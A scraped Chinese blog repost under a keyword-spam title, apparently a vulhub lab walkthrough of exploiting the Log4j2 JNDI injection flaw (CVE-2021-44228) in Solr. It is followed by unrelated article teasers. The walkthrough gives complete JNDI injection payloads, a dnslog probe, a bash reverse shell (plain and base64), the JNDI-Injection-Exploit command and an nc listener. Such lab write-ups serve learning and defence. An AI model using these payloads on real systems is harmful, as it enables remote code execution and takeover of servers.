设计教程网站推荐湖南网络推广排名

news/2025/9/29 9:55:05/文章来源:
设计教程网站推荐,湖南网络推广排名,这么联系做网站推广,荆州公司网站建设所用环境 宝塔云服务器 log4j2 是Apache的⼀个java日志框架#xff0c;我们借助它进行日志相关操作管理#xff0c;然而在2021年末log4j2爆出了远程代码执行漏洞#xff0c;属于严重等级的漏洞。 apache log4j通过定义每⼀条日志信息的级别能够更加细致地控制日志⽣成地过…所用环境 宝塔云服务器 log4j2 是Apache的⼀个java日志框架我们借助它进行日志相关操作管理然而在2021年末log4j2爆出了远程代码执行漏洞属于严重等级的漏洞。 apache log4j通过定义每⼀条日志信息的级别能够更加细致地控制日志⽣成地过程受影响地版本中纯在JNDI注入漏洞导致日志在记录用户输入地数据时触发了注入漏洞该漏洞可导致远程代码执行且利用条件低影响范围广小到网站大到可联网的车都受影响建议使用了相关版本的应用或者插件尽快升级修补做好相关方措施避免造成不必要的损失。 一、启动靶场容器并在浏览器中进行访问 #启动命令 cd vulhub/log4j/CVE-2021-44228 docker-compose up -d docker ps 这里看到我们的容器端口为8983在浏览器中访问该地址 这里我们访问成功 二、用dnslog测试注入效果 访问dnslog.cn获取一个新的链接 可以发现 /solr/admin/cores?action 这里有个参数可以传可以按照上面的原理 先构造⼀个请求传过去存在JNDI注入那么ldap服务端会执行我们传上去的payload然后在DNSLOG 平台上那里留下记录我们可以看到留下了访问记录并且前面的参数被执行后给我们回显了java的版本号! /solr/admin/cores?action${jndi:ldap://${sys:java.version}.0ww7ad.dnslog.cn} 刷新一下便看到了java的版本号 三、开始反弹Shell # JDNI项⽬地址 https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0# 反弹shell bash -i /dev/tcp/172.16.1.159/6666 01# 反弹Shell-base64加密 YmFzaCAtaSAJiAvZGV2L3RjcC8xNzIuMTYuMS4xNTkvNjY2NiAwPiYx# 命令模板 java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c{echo,[经过base64编码后的命令]}|{base64,-d}|bash -A [你的vpsip]# 最终Payload java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8xNzIuMTYuMS4xODYvNjk2OSAwPiYx}|{base64,-d}|{bash,-i} -A 172.16.1.186# 备注 -C后⾯的参数是要执⾏的命令以及编码⽅式-A后⾯就是对应ip地址。 这里已经生成了我们的恶意代码类 我们再打开一个终端来监听我们的6666端口 nc -lvvp 6666 拿取JDK1.8并构造Payload且直接访问..可以看到网页被重定向到了我们的恶意类网址... /solr/admin/cores?action${jndi:ldap://101.42.118.221:1389/jyvecl} 此时我们就获取了该网站的shell我们输入ls来看看命令是否被执行 拿下

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/921656.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

完整教程:南华 NHJX-13 型底盘间隙仪:机动车底盘安全检测的核心设备

完整教程:南华 NHJX-13 型底盘间隙仪:机动车底盘安全检测的核心设备pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: &q…

vue3使用路由配置

1、安装依赖 npm i vue-router2、创建配置文件 index.js import {createRouter, createWebHistory} from vue-routerconst router = createRouter({history: createWebHistory(),routes: [] })// 路由前置守卫 router.…

术语俗话 --- 什么是mib

术语俗话 --- 什么是mibmib通俗讲就是用id查询数据的统一数据库,这台设备的所有数据都会保存到这一个库里。比如华为企业路由器会用mib查询到网卡数量和网络历史速度。snmp底层也是mib查询比如:.1.3.6.1.4.1.2011.6.…

分享一个YTB视频下载器

分享一个YouTube视频下载器 输入YouTube视频链接,一键下载视频文件。 (支持多种清晰度下载,完全免费)下载步骤说明 复制YouTube视频网址,粘贴到输入框 点击"开始下载"按钮 选择需要的视频清晰度 等待视…

基于Python+Vue开发的家具商城管理系统源码+运行步骤

项目简介该项目是基于Python+Vue开发的家具商城管理系统(前后端分离),这是一项为大学生课程设计作业而开发的项目。该系统旨在帮助大学生学习并掌握Python编程技能,同时锻炼他们的项目设计与开发能力。通过学习基于…

2025年,CRM口碑排行榜:从SAAS到本地部署方案

在2025年这个数字化浪潮席卷全球的时代,客户关系管理(CRM)系统已成为企业提升竞争力、实现精细化运营的关键工具💡。无论是初创公司还是行业巨头,选择合适的CRM解决方案都能显著优化业务流程、增强客户粘性并驱动…

Commitlint 使用指南

安装1. 安装并创建配置文件//npm: npm install -D @commitlint/cli @commitlint/config-conventional//yarn: yarn add -D @commitlint/cli @commitlint/config-conventional 项目根目录创建 commitlint.config.js 文…

VonaJS提供的读写分离,直观,优雅

在VonaJS中实现读写分离,只需提供一组写数据源和一组读数据源。当用户访问后端 API 时,系统会按照规则自动选择写数据源或读数据源,访问相应的数据库,从而分摊压力,提升系统性能在VonaJS中实现读写分离,只需提供…

网站图标目录视频网站怎么做

很多朋友在用IIS6架网站的时候遇到不少问题,而这些问题有些在过去的IIS5里面就遇到过,有些是新出来的,俺忙活了一下午,做了很多次试验,结合以前的排错经验,做出了这个总结,希望能给大家帮上忙。…

免费开源的百度文库平替!支持多格式文档预览与存储!

DocHub 使用 Go 语言的 Beego 框架开发实现的类百度文库解决方案,支持 Office、Pdf、Txt、Mobi、EPub 等多种文档格式的在线阅读浏览。大家好,我是 Java陈序员。 想必大家都用过百度文库,常常因为没有会员而不能复制…

个人行业选择

尖端技术:AI,网络安全,底层开发 自由:独立开发设计,技术顾问

写假数据

我看不懂这种写法,教我,原始形态是什么样的api: (params) => getListApi({ ...params }),这是api接口函数(export表示导出,这样就不会忘了写导出了,比如在接口文件最后写export { getUserList, createUser, up…

个人网站搭建详细流程有了空间怎么做网站

原标题:那些牛逼的酒吧都用什么管理系统?关于酒吧你是熟悉还是陌生?对酒吧的管理系统?你接触的都有哪些?今天分享一个超大型酒吧的系统解决方案。宁波最大酒吧S86正式营业,视易娱加管理系统助力场所运营&am…

C语言的指针与cpp的引用

指针 vs 引用 的相似之处 共同特点:都是间接访问:都提供了对另一个对象/变量的间接访问 都避免拷贝:传递大型对象时都可以避免昂贵的拷贝操作 都能修改原对象:通过指针或引用都可以修改所指向的对象具体代码对比 #…

day24——Java高级技术深度解析:单元测试、反射、注解与动态代理 - 指南

day24——Java高级技术深度解析:单元测试、反射、注解与动态代理 - 指南pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family:…

进程互斥的硬件实现方式(比较难懂的一节课,但是我搞懂了)

中断屏蔽方法 利用开关中断指令实现 关中断后,不允许当前进程被中断,也就不会发生进程切换 优点:简单高效 缺点:不适用于多处理机,只适用于操作系统内核进程,不适合于用户进程(因为开关中断指令只运行于内核态)…

详细介绍:Spring MVC 请求执行流程详解

pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Monaco", "Courier New", …

GreenPlum - commit

GreenPlum - commit在Python代码中执行完insert, delete, update后要执行conn.commit()才能生效,truncate语句之后也要执行conn.commit(),否则truncate不生效。

【征文计划】基于Rokid眼镜平台的AR历史情景课堂创意应用 - 指南

【征文计划】基于Rokid眼镜平台的AR历史情景课堂创意应用 - 指南pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "C…